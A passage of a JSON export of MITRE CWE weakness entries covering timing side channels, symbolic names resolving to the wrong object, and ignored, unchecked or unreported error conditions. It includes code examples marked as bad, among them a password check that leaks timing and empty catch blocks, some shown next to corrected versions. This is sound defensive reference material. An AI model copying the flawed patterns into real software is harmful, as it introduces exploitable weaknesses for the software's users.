Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Application Data","Other"],"Note":"Information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Whenever possible, specify implementation strategies that do not introduce time variances in operations."},{"Phase":"Implementation","Description":"Often one can artificially manipulate the time which operations take or -- when operations occur -- can remove information from the attacker."},{"Phase":"Implementation","Description":"It is reasonable to add artificial or random delays so that the amount of CPU time consumed is independent of the action being taken by the application."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the attacker observes how long an authentication takes when the user types in the correct password.","Body_Text":["When the attacker tries their own values, they can first try strings of various length. When they find a string of the right length, the computation will take a bit longer, because the for loop will run at least once. Additionally, with this code, the attacker can possibly learn one character of the password at a time, because when they guess the first character right, the computation will take longer than a wrong guesses. Such an attack can break even the most sophisticated password with a few hundred guesses.","Note that, in this example, the actual password must be handled in constant time, as far as the attacker is concerned, even if the actual password is of an unusual length. This is one reason why it is good to use an algorithm that, among other things, stores a seeded cryptographic one-way hash of the password, then compare the hashes, which will always be of the same length."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def validate_password(actual_pw, typed_pw):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if len(actual_pw) <> len(typed_pw):for i in len(actual_pw):return 1","xhtml:div":[{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}},{"#text":"if actual_pw[i] <> typed_pw[i]:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Timing"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert Timing Channel"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"386":{"attr":{"@_ID":"386","@_Name":"Symbolic Name not Mapping to Correct Object","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"367","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"486","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The attacker can gain access to otherwise unauthorized resources."},{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Read Application Data","Read Files or Directories","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"The resource in question, or other resources (through the corrupted one) may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Integrity"],"Impact":"Modify Files or Directories","Note":"In some cases it may be possible to delete files that a malicious user might not otherwise have access to -- such as log files."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Symbolic name not mapping to correct object"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"390":{"attr":{"@_ID":"390","@_Name":"Detection of Error Condition Without Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software detects a specific error, but takes no actions to handle the error.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"401","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"],"Note":"An attacker could utilize an ignored error condition to place the system in an unexpected state that could lead to the execution of unintended logic and could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly handle each exception. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."},{"Phase":"Implementation","Description":"If a function returns an error, it is important to either fix the problem and try again, alert the user that an error has happened and let the program continue, or alert the user and close and cleanup the program."},{"Phase":"Testing","Description":"Subject the software to extensive testing to discover some of the possible instances of where/how errors or return values are not handled. Consider testing techniques such as ad hoc, equivalence partitioning, robustness and fault tolerance, mutation, and fuzzing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"//We do nothing so we just ignore the error.","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"printf(\\"Malloc failed to allocate memory resources\\");return -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate.","Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code."]},{"Intro_Text":"In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"char* readfile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"/* bug: insert code to handle this later */","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"char* readFile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (char *str) {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"printf(\\"Error: %s \\\\n\\", str);infile.close();throw str;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Error occurred trying to read from file \\\\n\\");infile.close();throw;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program."},{"Intro_Text":"In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char[] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"/* do nothing, but catch so it\'ll compile... */","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) throws FileNotFoundException, IOException, Exception {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (FileNotFoundException ex) {} catch (IOException ex) {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char [] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"System.err.println (\\"Error: FileNotFoundException opening the input file: \\" + filename );System.err.println (\\"\\" + ex.getMessage() );throw new FileNotFoundException(ex.getMessage());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"System.err.println(\\"Error: IOException reading the input file.\\\\n\\" + ex.getMessage() );throw new IOException(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Exception reading the input file.\\\\n\\" + ex.getMessage() );throw new Exception(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper error handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR00-J","Entry_Name":"Do not suppress or ignore checked exceptions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 11: Failure to Handle Errors Correctly." Page 183"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Error Handling","attr":{"@_Date":"2008-04-11"}}}},"391":{"attr":{"@_ID":"391","@_Name":"Unchecked Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice between a language which has named or unnamed exceptions needs to be done. While unnamed exceptions exacerbate the chance of not properly dealing with an exception, named exceptions suffer from the up call version of the weak base class problem."},{"Phase":"Requirements","Description":"A language can be used which requires, at compile time, to catch all serious exceptions. However, one must make sure to use the most current version of the API as new exceptions could be added."},{"Phase":"Implementation","Description":"Catch all relevant exceptions. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt ignores a rarely-thrown exception from doExchange().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (RareException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// this can never happen"}}],"xhtml:br":""}},"Body_Text":"If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program\'s behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Empty Catch Block"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uncaught exception"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":[{"#text":"This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts. It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue. CWE analysts might map to this entry based on any of these issues. 7PK has \\"Empty Catch Block\\" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle. In PLOVER there is \\"Unchecked Return Value\\" which is CWE-252, but unlike \\"Empty Catch Block\\" there isn\'t even a check of the issue - and \\"Unchecked Error Condition\\" implies lack of a check. For CLASP, \\"Uncaught Exception\\" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least. There are other issues related to error handling and checks.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":"When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["This method call can never fail.","It doesn\'t matter if this call fails."]}}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"392":{"attr":{"@_ID":"392","@_Name":"Missing Report of Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software encounters an error but does not provide a status code or return value to indicate that an error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"],"Note":"Errors that are not properly reported could place the system in an unexpected state that could lead to unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a doPost() servlet method, the server returns \\"200 OK\\" (default) even if an error occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Something that may throw an exception."}},{"#text":"logger.error(\\"Caught: \\" + t.toString());return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0063","Description":"Function returns \\"OK\\" even if another function returns a different status code than expected, leading to accepting an invalid PIN number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0063"},{"Reference":"CVE-2002-1446","Description":"Error checking routine in PKCS#11 library returns \\"OK\\" status even when invalid signature is detected, allowing spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1446"},{"Reference":"CVE-2002-0499","Description":"Kernel function truncates long pathnames without generating an error, leading to operation on wrong directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0499"},{"Reference":"CVE-2005-2459","Description":"Function returns non-error value when a particular erroneous condition is encountered, leading to resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2459"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Error Status Code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS03-J","Entry_Name":"Ensure that tasks executing in a thread pool do not fail silently"},{"attr":{"@_Taxonomy_Name":"Software Fault 